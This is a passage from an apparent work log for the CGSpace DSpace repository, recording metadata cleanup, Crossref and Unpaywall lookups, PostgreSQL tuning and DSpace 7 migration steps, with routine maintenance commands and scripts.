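print(normalize_online_date("2021-Nov-11"))    # 2021-11-11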
    +
  • This covered about 1,300 items, then I did about 100 more messier ones with some more regex wrangling +
      +
    • I removed the dcterms.description[en_US] field from items where I updated the dates
    • +
    +
  • +
  • Then I added dcterms.available to the submission form and the item view +
      +
    • We need to announce this to the editors
    • +
    +
  • +
+

2023-02-13

+
    +
  • Export CGSpace to do some metadata quality checks +
      +
    • I added CGIAR Trust Fund as a donor to some new Initiative outputs
    • +
    • I moved some abstracts from the description field
    • +
    • I moved some version information to the cg.edition field
    • +
    +
  • +
+

2023-02-14

+
    +
  • The PRMS team in Colombia sent some questions about countries on CGSpace +
      +
    • I had to fix some that were clearly wrong, but there is also a difference between CGSpace and MEL because we use mostly iso-codes, and MEL uses the UN M.49 list
    • +
    • Then I re-ran the country code tagger from cgspace-java-helpers, forcing the update on all items in the Initiatives community
    • +
    +
  • +
  • Remove Alliance research levers from cg.contributor.crp field after discussing with Daniel and Maria +
      +
    • This was a mistake on TIP’s part, and there is no direct mapping between research levers and CRPs
    • +
    +
  • +
  • I exported CGSpace to check Initiative collection mappings, regions, and licenses +
      +
    • Peter told me that all CGIAR blog posts for the Initiatives should be CC-BY-4.0, and I see the logo at the bottom in light gray!
    • +
    • I had previously missed that and removed some licenses for blog posts
    • +
    • I checked cgiar.org, ifpri.org, icarda.org, iwmi.cgiar.org, irri.org, etc and corrected a handful
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+

2023-02-15

+
    +
  • Work on rebasing my local DSpace 7 dev branches on top of the latest 7.5-SNAPSHOT +
      +
    • It seems the issues I had with the dspace submission-forms-migrate tool in August, 2022 were fixed
    • +
    +
  • +
  • I imported a fresh PostgreSQL snapshot from CGSpace and then removed the Atmire migrations and ran the new migrations as I originally noted in March, 2022, and is pointed out in the DSpace 7 upgrade notes +
      +
    • Now I get a new error:
    • +
    +
  • +
+
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
+localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
+localhost/dspace7= \q
+$ ./bin/dspace database migrate ignored
+...
+
+CREATE INDEX resourcepolicy_action_idx ON resourcepolicy(action_id)
+
+        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.handleException(DefaultSqlScriptExecutor.java:275)
+        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:222)
+        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.execute(DefaultSqlScriptExecutor.java:126)
+        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.executeOnce(SqlMigrationExecutor.java:69)
+        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.lambda$execute$0(SqlMigrationExecutor.java:58)
+        at org.flywaydb.core.internal.database.DefaultExecutionStrategy.execute(DefaultExecutionStrategy.java:27)
+        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.execute(SqlMigrationExecutor.java:57)
+        at org.flywaydb.core.internal.command.DbMigrate.doMigrateGroup(DbMigrate.java:377)
+        ... 24 more
+Caused by: org.postgresql.util.PSQLException: ERROR: relation "resourcepolicy_action_idx" already exists
+        at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2676)
+        at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2366)
+        at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:356)
+        at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:496)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:413)
+        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:333)
+        at org.postgresql.jdbc.PgStatement.executeCachedSql(PgStatement.java:319)
+        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:295)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:290)
+        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
+        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
+        at org.flywaydb.core.internal.jdbc.JdbcTemplate.executeStatement(JdbcTemplate.java:201)
+        at org.flywaydb.core.internal.sqlscript.ParsedSqlStatement.execute(ParsedSqlStatement.java:95)
+        at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:210)
+        ... 30 more
+
    +
  • I dropped that index and then the migration succeeded:
  • +
+
localhost/dspace7= ☘ DROP INDEX resourcepolicy_action_idx;
+localhost/dspace7= ☘ \q
+$ ./bin/dspace database migrate ignored
+Done.
+
+

2023-02-16

+
    +
  • I found a suspicious number of PostgreSQL locks on CGSpace and decided to investigate:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+     44 dspaceApi
+    372 dspaceCli
+    446 dspaceWeb
+
    +
  • This started happening yesterday and I killed a few locks that were several hours old after inspecting the locks-age.sql output
  • +
  • I also checked the locks.sql output, which helpfully lists the blocked PID and the blocking PID, to find one blocking PID that was idle in transaction +
      +
    • I killed that process and then all other locks were instantly processed
    • +
    +
  • +
  • I filed a GitHub issue on dspace-angular requesting the item view to use the bitstream description instead of the file name if present
  • +
  • Weekly CG Core types meeting +
      +
    • I need to go through the actions and remove those items that are only for CGSpace internal use, ie: +
        +
      • CD-ROM
      • +
      • Manuscript-unpublished
      • +
      • Photo Report
      • +
      • Questionnaire
      • +
      • Wiki
      • +
      +
    • +
    +
  • +
  • Weekly CGIAR Repository Working Group meeting
  • +
  • I did some experiments with Crossref dates for about 20,000 DOIs in CGSpace using my crossref-doi-lookup.py script
  • +
  • Some things I noted from reading the Crossref API docs and inspecting the records for a few dozen DOIs manually: +
      +
    • ["created"]["date-parts"] → Date on which the DOI was first registered (not useful for us)
    • +
    • ["published-print"]["date-parts"] → Date on which the work was published in print
    • +
    • ["journal-issue"]["published-print"]["date-parts"] → When present, is 99% the same as the above
    • +
    • ["published-online"]["date-parts"] → Date on which the work was published online
    • +
    • ["journal-issue"]["published-online"]["date-parts"] → Much more rare, and only 50% the same as the above, so unreliable
    • +
    • ["issued"]["date-parts"] → Earliest of published-print and published-online (not useful to us)
    • +
    +
  • +
  • After checking the DOIs manually I decided that when the published-print date exists, it is usually more accurate than our issued dates (see the sketch after this list) +
      +
    • I set 12,300 issue dates to those from Crossref
    • +
    +
  • +
  • I also decided that, when published-online exists, it is usually accurate when I check the publisher page (we don’t have many online dates to compare) +
      +
    • I set the available date for ~7,000 items to the published-online date as long as: +
        +
      • There was no dcterms.available date already
      • +
      • It was different than the issued date, because for now I only want online dates that are different, in case this is an online only journal in which case that can be the issue date… maybe I’ll re-visit that later
      • +
      +
    • +
    +
  • +
+
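A sketch of the date selection logic described above, working on a raw Crossref work record (field names as in the Crossref REST API; an illustration, not the exact code I ran):

def crossref_dates(work: dict):
    """Return (issued, available): prefer published-print for the issue date,
    and only use published-online for dcterms.available when it differs."""

    def date_from(field: str):
        try:
            parts = work[field]["date-parts"][0]
        except (KeyError, IndexError):
            return None
        # date-parts can be [year], [year, month], or [year, month, day]
        return "-".join(f"{part:02d}" for part in parts)

    issued = date_from("published-print")
    online = date_from("published-online")
    available = online if online and online != issued else None
    return issued, available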

2023-02-17

+
    +
  • It seems some (all?) of the changes I applied to dates last night didn’t get saved… +
      +
    • I don’t know what happened, so I will run them again after some investigation
    • +
    • I submitted the first batch of ~7,600 changes and it took twelve hours!
    • +
    • I almost cancelled it because after applying the changes there was a lock blocking everything for two hours, and it seemed to be stuck, but I kept checking it and saw that the query_start and state_change were being updated despite it being state “idle in transaction”:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_stat_activity WHERE pid=1025176' | less -S
+
    +
  • I will apply the other changes in smaller batches…
  • +
  • Lately I’ve noticed a lot of activity from the country code tagger curation task +
      +
    • Looking in the logs I see items being tagged that are very old and should have already been tagged years ago
    • +
    • Also, I see a ton of these errors whenever the task is updating an item:
    • +
    +
  • +
+
2023-02-17 08:01:00,252 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/89020 with status: 0. Result: '10568/89020: added 1 alpha2 country code(s)'
+2023-02-17 08:01:00,467 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: a0fe9d9a-6ac1-4b6a-8fcb-dae07a6bbf58 message:missing required field: epersonID
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
+        at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
+        at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
+        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
+        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+        at org.dspace.curate.Curator.visit(Curator.java:541)
+        at org.dspace.curate.Curator$TaskRunner.run(Curator.java:568)
+        at org.dspace.curate.Curator.doCollection(Curator.java:515)
+        at org.dspace.curate.Curator.doCommunity(Curator.java:487)
+        at org.dspace.curate.Curator.doSite(Curator.java:451)
+        at org.dspace.curate.Curator.curate(Curator.java:269)
+        at org.dspace.curate.Curator.curate(Curator.java:203)
+        at org.dspace.curate.CurationCli.main(CurationCli.java:220)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • This must be related…
  • +
+

2023-02-18

+
    +
  • I realized why the country-code-tagger was tagging everything: I had overridden the force parameter last week!
  • +
  • Start a harvest on AReS
  • +
+

2023-02-20

+
    +
  • IWMI is concerned that some of their items with top Altmetric attention scores don’t show up in the AReS Explorer +
      +
    • I looked into it for one and found that AReS is using the Handle, but Altmetric hasn’t associated the Handle with the DOI
    • +
    +
  • +
  • Looking into country and region issues for the PRMS team +
      +
    • Last week they had some questions about some invalid countries that ended up being typos
    • +
    • I realized my cgspace-java-helpers country-code-tagger curation task is not using the latest version, so it was missing Türkiye
    • +
    • I compiled the new version and ran it manually, but I have to upload a new version to Maven Central and then update the dependency in dspace/modules/additions/pom.xml ughhhhhh
    • +
    • I tagged version 6.2 with the change for Türkiye and uploaded it to Maven Central with mvn clean deploy
    • +
    +
  • +
  • I’m having second thoughts about switching to UN M.49 for countries because there are just too many tradeoffs +
      +
    • I want to find a way to keep our existing list, and codify some rules for it
    • +
    • There are several discussions related to the shortcomings of ISO themselves and the iso-codes project, for example: + +
    • +
    • I almost want to say fuck it, let’s just use iso-codes and tell everyone to deal with it, but make sure we handle ISO 3166-1 Alpha2 or probably Alpha3 in the future
    • +
    • Something like: +
        +
      • Prefer common_name if it exists
      • +
      • Prefer the shorter of name and official name (see the sketch after this list)
      • +
      +
    • +
    +
  • +
+
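Applying that compromise to the iso-codes JSON might look like this sketch (file path and field names are from the Debian iso-codes package; parse-iso-codes.py may differ):

import json

# iso_3166-1.json ships with the iso-codes package
with open("/usr/share/iso-codes/json/iso_3166-1.json") as f:
    countries = json.load(f)["3166-1"]

def preferred_name(country: dict) -> str:
    # Prefer common_name if it exists
    if "common_name" in country:
        return country["common_name"]
    # Otherwise prefer the shorter of name and official_name
    candidates = [country["name"]]
    if "official_name" in country:
        candidates.append(country["official_name"])
    return min(candidates, key=len)

for country in countries:
    print(country["alpha_2"], preferred_name(country))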

2023-02-21

+
    +
  • Continue working on my parse-iso-codes.py script to parse the iso-codes JSON for ISO 3166-1 +
      +
    • I also started a spreadsheet to track current CGSpace country names, proposed new names using the compromise above, and UN M.49 names
    • +
    • I proposed this to Peter but he wasn’t happy because there are still some stupidly long and political names there
    • +
    +
  • +
  • I bumped the version of cgspace-java-helpers to 6.2-SNAPSHOT and pushed it to Maven Central because I can’t figure out how to get non-snapshot releases to go there
  • +
  • Ouch, grunt 1.6.0 was released a few weeks ago, which relies on Node.js v16, thus breaking the Mirage 2 build in DSpace 6 + +
  • +
  • Help Moises from CIP troubleshoot harvesting issues on their WordPress site +
      +
    • I see 2,000 requests with the user agent “RTB website BOT” today and they are all HTTP 200
    • +
    +
  • +
+
# grep 'RTB website BOT' /var/log/nginx/rest.log | awk '{print $9}' | sort | uniq -c | sort -h
+   2023 200
+
    +
  • Start reviewing and fixing metadata for Sam’s ~250 CAS publications from last year +
      +
    • Both Abenet and Peter have already looked at them and Sam has been waiting for months on this
    • +
    +
  • +
+

2023-02-22

+
    +
  • Continue proofing CAS records for Sam +
      +
    • I downloaded all the PDFs manually and checked the issue dates for each from the PDF, noting some that had licenses, ISBNs, etc
    • +
    • I combined the title, abstract, and system subjects into one column to mine them for AGROVOC terms:
    • +
    +
  • +
+
toLowercase(value) + toLowercase(cells["dcterms.abstract"].value) + toLowercase(cells["cg.subject.system"].value.replace("||", " "))
+
    +
  • Then I extracted a list of AGROVOC terms the same way I did in August, 2022 and used this Jython code to extract matching terms:
  • +
+
import re
+
+with open(r"/tmp/agrovoc-subjects.txt",'r') as f : 
+    terms = [name.rstrip().lower() for name in f]
+
+return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
+
+# A second Jython expression to deduplicate the matched terms in the resulting multi-value cell:
+deduped_list = list(set(value.split("||")))
+return '||'.join(map(str, deduped_list))
+
+

2023-02-23

+
    +
  • Tag v0.6.1 of csv-metadata-quality
  • +
  • Weekly meeting about CG Core types +
      +
    • I need to get some definitions from Peter for some types
    • +
    +
  • +
  • Peter sent some of the feedback from Indira to XMLUI +
      +
    • I removed some old facets, limited others to less values, and adjusted the recent submissions from 5 to 10
    • +
    +
  • +
+

2023-02-24

+
    +
  • More work on understanding Sam’s CAS publications to prepare for uploading them to CGSpace +
      +
    • I need to reconcile the duplicates and Peter’s type re-classifications in the final version of the spreadsheet
    • +
    • I flagged all the duplicates by creating a custom text facet matching all their titles like:
    • +
    +
  • +
+
or(
+  isNotNull(value.match("Evaluation of the CGIAR Research Program on Climate Change, Agriculture and Food Security (CCAFS)")),
+  isNotNull(value.match("Report of the IEA Workshop on Development, Use and Assessment of TOC in CGIAR Research, Rome, 12-13 January 2017")),
+  isNotNull(value.match("Report of the IEA Workshop on Evaluating the Quality of Science, Rome, 10-11 December 2015")),
+  isNotNull(value.match("Review of CGIAR’s Intellectual Assets Principles")),
+...
+)
+
    +
  • Annoyingly this seems to miss the ones with parentheses so I had to do those manually +
      +
    • This matched thirty-seven items, then I flagged them so I can handle them separately after uploading the others
    • +
    • Then I used the URL field in the old version of the file to match the items with types Evaluation and Independent Commentary since Peter changed them
    • +
    • I added extent, volume, issue, number, and affiliation to a few journal articles
    • +
    • Then I did some last minute checks to make sure we’re not uploading files for items marked as having “multiple documents”
    • +
    +
  • +
+

2023-02-25

+
    +
  • Oh nice, my pull request adding common names for Iran, Laos, and Syria to iso-codes was merged
  • +
  • I did a test import of the 198 CAS Publications on DSpace Test, then inspected Abenet’s file with Gaia’s “multiple documents” field one more time and decided to do the import on CGSpace +
      +
    • Gaia’s “multiple documents” column had some text like “E6” and “F7” that didn’t make any sense, and those files were not even in the SharePoint
    • +
    +
  • +
+

2023-02-26

+
    +
  • Start a harvest on AReS
  • +
+

2023-02-27

+
    +
  • I found two items for the CAS Publications that were marked as duplicates, but upon second inspection were not, so I uploaded them to CGSpace +
      +
    • That makes the total number of items for CAS 200…
    • +
    +
  • +
  • I did some CSV joining and inspections with the remaining thirty-six duplicates with the metadata for their existing items on CGSpace and uploaded them
  • +
  • Do some work on the new DSpace 7 submission forms +
      +
    • I ended up reverting to the stock configuration to use some new techniques like the style and type bind
    • +
    +
  • +
+

2023-02-28

+
    +
  • Keep working on the DSpace 7 submission forms +
      +
    • As part of this I asked Maria and Francesca if they are still using the cg.link.permalink (Bioversity publications permalink) and they said no, so we can remove it from the submission form
    • +
    • I also removed cg.subject.ccafs since the CRP ended over a year ago and cg.subject.pabra since there have only been a handful of new items in their collection and they seem to be using Alliance subjects instead
    • +
    +
  • +
  • I filed a bug on DSpace regarding the inability to add freetext values from an input field that uses a vocabulary
  • +

March, 2023

+

2023-03-01

+
    +
  • Remove cg.subject.wle and cg.identifier.wletheme from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
  • +
  • iso-codes 4.13.0 was released, which incorporates my changes to the common names for Iran, Laos, and Syria
  • +
  • I finally got through with porting the input form from DSpace 6 to DSpace 7
  • +
+
    +
  • I can’t put my finger on it, but the input form has to be formatted very particularly, for example if your rows have more than two fields in them without a sufficient Bootstrap grid style, or if you use a twobox, etc, the entire form step appears blank
  • +
+

2023-03-02

+
    +
  • I did some experiments with the new Pandas 2.0.0rc0 Apache Arrow support +
      +
    • There is a change to the way nulls are handled and it causes my tests for pd.isna(field) to fail
    • +
    • I think we need to consider blanks as null, but I’m not sure
    • +
    +
  • +
  • I made some adjustments to the Discovery sidebar facets on DSpace 6 while I was looking at the DSpace 7 configuration +
      +
    • I downgraded CIFOR subject, Humidtropics subject, Drylands subject, ICARDA subject, and Language from DiscoverySearchFilterFacet to DiscoverySearchFilter in discovery.xml since we are no longer using them in sidebar facets
    • +
    +
  • +
+

2023-03-03

+ +

2023-03-04

+ +

2023-03-05

+
    +
  • Start a harvest on AReS
  • +
+

2023-03-06

+
    +
  • Export CGSpace to do Initiative collection mappings +
      +
    • There were thirty-three that needed updating
    • +
    +
  • +
  • Send Abenet and Sam a list of twenty-one CAS publications that had been marked as “multiple documents” that we uploaded as metadata-only items +
      +
    • Goshu will download the PDFs for each and upload them to the items on CGSpace manually
    • +
    +
  • +
  • I spent some time trying to get csv-metadata-quality working with the new Arrow backend for Pandas 2.0.0rc0 +
      +
    • It seems there is a problem recognizing empty strings as na with pd.isna()
    • +
    • If I do pd.isna(field) or field == "" then it works as expected, but that feels hacky
    • +
    • I’m going to test again on the next release…
    • +
    • Note that I had been setting both of these global options:
    • +
    +
  • +
+
pd.options.mode.dtype_backend = 'pyarrow'
+pd.options.mode.nullable_dtypes = True
+
    +
  • Then reading the CSV like this:
  • +
+
df = pd.read_csv(args.input_file, engine='pyarrow', dtype='string[pyarrow]')
+

2023-03-07

+
    +
  • Create a PostgreSQL 14 instance on my local environment to start testing compatibility with DSpace 6 as well as all my scripts:
  • +
+
$ podman pull docker.io/library/postgres:14-alpine
+$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:14-alpine
+$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
+$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
+
    +
  • Peter sent me a list of items that had ILRI affiliation on Altmetric, but that didn’t have Handles +
      +
    • I ran a duplicate check on them to find if they exist or if we can import them
    • +
    • There were about ninety matches, but a few dozen of those were pre-prints!
    • +
    • After excluding those there were about sixty-one items we already have on CGSpace so I will add their DOIs to the existing items +
        +
      • After joining these with the records from CGSpace and inspecting the DOIs I found that only forty-four were new DOIs
      • +
      • Surprisingly some of the DOIs on Altmetric were not working, though we also had some that were not working (specifically the Journal of Agricultural Economics seems to have reassigned DOIs)
      • +
      +
    • +
    • For the rest of the ~359 items I extracted their DOIs and looked up the metadata on Crossref using my crossref_doi_lookup.py script +
        +
      • After spending some time cleaning the data in OpenRefine I realized we don’t get access status from Crossref
      • +
      • We can imply it if the item is Creative Commons, but otherwise I might be able to use Unpaywall’s API
      • +
      • I found some false positives in Unpaywall, so I might only use their data when it says the DOI is not OA…
      • +
      +
    • +
    +
  • +
  • During this process I updated my crossref_doi_lookup.py script to get more information from Crossref like ISSNs, ISBNs, full journal title, and subjects (a rough sketch of that kind of lookup is below, after this list)
  • +
  • An unscientific comparison of duplicate checking Peter’s file with ~500 titles on PostgreSQL 12 and PostgreSQL 14: +
      +
    • PostgreSQL 12: 0.11s user 0.04s system 0% cpu 19:24.65 total
    • +
    • PostgreSQL 14: 0.12s user 0.04s system 0% cpu 18:13.47 total
    • +
    +
  • +
+
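Not the actual script, but a rough sketch of the kind of Crossref lookup I mean, using the public REST API (the email address is a placeholder for the polite pool, and the field selection is just an example):

import requests

def crossref_lookup(doi: str, email: str) -> dict:
    # Query the Crossref REST API for a single DOI
    r = requests.get(f"https://api.crossref.org/works/{doi}", params={"mailto": email}, timeout=30)
    r.raise_for_status()
    message = r.json()["message"]

    return {
        "doi": doi,
        "title": (message.get("title") or [""])[0],
        "journal": (message.get("container-title") or [""])[0],
        "issns": "||".join(message.get("ISSN", [])),
        "isbns": "||".join(message.get("ISBN", [])),
        "licenses": "||".join(lic["URL"] for lic in message.get("license", [])),
    }

print(crossref_lookup("10.1016/j.foodqual.2021.104362", "fuuu@example.com"))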

2023-03-08

+
    +
  • I am wondering how to speed up PostgreSQL trgm searches more +
      +
    • I see my local PostgreSQL is using vanilla configuration and I should update some configs:
    • +
    +
  • +
+
localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = 'shared_buffers';
+ setting │ unit 
+─────────┼──────
+ 16384   │ 8kB
+(1 row)
+
    +
  • I re-created my PostgreSQL 14 container with some extra memory settings:
  • +
+
$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:14-alpine -c shared_buffers=1024MB -c random_page_cost=1.1
+
+
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=64)); # \di+ shows index size is 795MB
+
    +
  • That took a few minutes to build… then the duplicate checker ran in 12 minutes: 0.07s user 0.02s system 0% cpu 12:43.08 total
  • +
  • On a hunch, I tried with a GIN index:
  • +
+
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gin_idx ON metadatavalue USING gin(text_value gin_trgm_ops); # \di+ shows index size is 274MB
+
    +
  • This ran in 19 minutes: 0.08s user 0.01s system 0% cpu 19:49.73 total +
      +
    • So clearly the GiST index is better for this task
    • +
    • I am curious what happens if I increase the signature length in the GiST index from 64 to 256 (which will surely increase the index size):
    • +
    +
  • +
+
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=256)); # \di+ shows index size is 716MB, which is less than the previous GiST index...
+
    +
  • This one finished in ten minutes: 0.07s user 0.02s system 0% cpu 10:04.04 total
  • +
  • I might also want to increase my work_mem (default 4MB):
  • +
+
localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = 'work_mem';
+ setting │ unit 
+─────────┼──────
+ 4096    │ kB
+(1 row)
+
    +
  • After updating my Crossref lookup script and checking the remaining ~359 items I found eight more duplicates already existing on CGSpace
  • +
  • Wow, I found a really cool way to fetch URLs in OpenRefine +
      +
    • I used this to fetch the open access status for each DOI from Unpaywall
    • +
    +
  • +
  • First, create a new column called “url” based on the DOI that builds the request URL. I used a Jython expression:
  • +
+
unpaywall_baseurl = 'https://api.unpaywall.org/v2/'
+email = "a.orth+unpaywall@cgiar.org"
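+# In OpenRefine Jython expressions, "value" is the current cell (here, the DOI column)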
+doi = value.replace("https://doi.org/", "")
+request_url = unpaywall_baseurl + doi + '?email=' + email
+
+return request_url
+
    +
  • Then create a new column based on fetching the values in that column. I called it “unpaywall_status”
  • +
  • Then you get a JSON blob in each and you can extract the Open Access status with a GREL like value.parseJson()['is_oa'] +
      +
    • I checked a handful of results manually and found that the limited access status was more trustworthy from Unpaywall than the open access, so I will just tag the limited access ones
    • +
    +
  • +
  • I merged the funders and affiliations from Altmetric into my file, then used the same technique to get Crossref data for open access items directly into OpenRefine and parsed the abstracts +
      +
    • The syntax was hairy because it’s marked up with tags like <jats:p>, but this got me most of the way there:
    • +
    +
  • +
+
value.replace("jats:p", "jats-p").parseHtml().select("jats-p")[0].innerHtml()
+value.replace("<jats:italic>","").replace("</jats:italic>", "")
+value.replace("<jats:sub>","").replace("</jats:sub>", "").replace("<jats:sup>","").replace("</jats:sup>", "")
+
    +
  • I uploaded the 350 items to DSpace Test so Peter and Abenet can explore them
  • +
  • I exported a list of authors, affiliations, and funders from the new items to let Peter correct them:
  • +
+
$ csvcut -c dc.contributor.author /tmp/new-items.csv | sed -e 1d -e 's/"//g' -e 's/||/\n/g' | sort | uniq -c | sort -nr | awk '{$1=""; print $0}' | sed -e 's/^ //' > /tmp/new-authors.csv
+
    +
  • Meeting with FAO AGRIS team about how to detect duplicates +
      +
    • They are currently using a sha256 hash on titles, which will work, but will only return exact matches
    • +
    • I told them to try to normalize the string, drop stop words, etc. to increase the possibility that the hash matches (a rough sketch of that idea is below, after this list)
    • +
    +
  • +
  • Meeting with Abenet to discuss CGSpace issues +
      +
    • She reminded me about needing a metadata field for first author when the affiliation is ILRI
    • +
    • I said I prefer to write a small script for her that will check the first author and first affiliation… I could do it easily in Python, but would need to put a web frontend on it for her
    • +
    • Unless we could do that in AReS reports somehow
    • +
    +
  • +
+
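Not something I sent them, just a rough sketch of the normalize-then-hash idea mentioned above (the stop word list and normalization steps are only examples):

import hashlib
import re
import unicodedata

STOP_WORDS = {"a", "an", "and", "of", "the"}  # example list only

def title_hash(title: str) -> str:
    # Normalize Unicode, lowercase, strip punctuation, and drop stop words so
    # that near-identical titles produce the same SHA-256 digest
    title = unicodedata.normalize("NFKD", title).lower()
    title = re.sub(r"[^\w\s]", "", title)
    words = [word for word in title.split() if word not in STOP_WORDS]

    return hashlib.sha256(" ".join(words).encode("utf-8")).hexdigest()

print(title_hash("The Effects of Drought on Maize Yields") == title_hash("Effects of drought on maize yields"))  # True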

2023-03-09

+ +

2023-03-10

+
    +
  • CKM is getting ready to launch their new website and they display CGSpace thumbnails at 255x362px +
      +
    • Our thumbnails are 300px so they get up-scaled and look bad
    • +
    • I realized that the last time we increased the size of our thumbnails was in 2013, from 94x130 to 300px
    • +
    • I offered to CKM that we increase them again to 400 or 600px
    • +
    • I did some tests to check the thumbnail file sizes for 300px, 400px, 500px, and 600px on this item:
    • +
    +
  • +
+
$ ls -lh 10568-126388-*
+-rw-r--r-- 1 aorth aorth  31K Mar 10 12:42 10568-126388-300px.jpg
+-rw-r--r-- 1 aorth aorth  52K Mar 10 12:41 10568-126388-400px.jpg
+-rw-r--r-- 1 aorth aorth  76K Mar 10 12:43 10568-126388-500px.jpg
+-rw-r--r-- 1 aorth aorth 106K Mar 10 12:44 10568-126388-600px.jpg
+
    +
  • Seems like 600px is 3 to 4 times larger file size, so maybe we should shoot for 400px or 500px +
      +
    • I decided on 500px
    • +
    • I started re-generating new thumbnails for the ILRI Publications, CGIAR Initiatives, and other collections
    • +
    +
  • +
  • On that note, I also re-worked the XMLUI item display to show larger thumbnails (from a max-width of 128px to 200px)
  • +
  • And now that I’m looking at thumbnails I am curious what it would take to get DSpace to generate WebP or AVIF thumbnails
  • +
  • Peter sent me citations and ILRI subjects for the 350 new ILRI publications +
      +
    • I guess he edited it in Excel because there are a bunch of encoding issues with accents
    • +
    • I merged Peter’s citations and subjects with the other metadata, ran one last duplicate check (and found one item!), then ran the items through csv-metadata-quality and uploaded them to CGSpace
    • +
    • In the end it was only 348 items for some reason…
    • +
    +
  • +
+

2023-03-12

+
    +
  • Start a harvest on AReS
  • +
+

2023-03-13

+
    +
  • Extract a list of DOIs from the Creative Commons licensed ILRI journal articles that I uploaded last week, skipping any that are “no derivatives” (ND):
  • +
+
$ csvgrep -c 'dc.description.provenance[en]' -m 'Made available in DSpace on 2023-03-10' /tmp/ilri-articles.csv \
+    | csvgrep -c 'dcterms.license[en_US]' -r 'CC(0|\-BY)' \
+    | csvgrep -c 'dcterms.license[en_US]' -i -r '\-ND\-' \
+    | csvcut -c 'id,cg.identifier.doi[en_US],dcterms.type[en_US]' > 2023-03-13-journal-articles.csv
+
    +
  • I want to write a script to download the PDFs and create thumbnails for them, then upload to CGSpace +
      +
    • I wrote one based on post_ciat_pdfs.py but it seems there is an issue uploading anything other than a PDF
    • +
    • When I upload a JPG or a PNG the file begins with:
    • +
    +
  • +
+
Content-Disposition: form-data; name="file"; filename="10.1017-s0031182013001625.pdf.jpg"
+
    +
  • … this means it is invalid… +
      +
    • I tried in both the ORIGINAL and THUMBNAIL bundle, and with different filenames
    • +
    • I tried manually on the command line with http and both PDF and PNG work… hmmmm
    • +
    • Hmm, this seems to have been due to some difference in behavior between the files and data parameters of requests.post()
    • +
    • I finalized the post_bitstreams.py script and uploaded eighty-five PDF thumbnails
    • +
    +
  • +
  • It seems Bizu uploaded covers for a handful so I deleted them and ran them through the script to get proper thumbnails
  • +
+

2023-03-14

+
    +
  • Add twelve IFPRI authors to our controlled vocabulary for authors and ORCID identifiers +
      +
    • I also tagged their existing items on CGSpace
    • +
    +
  • +
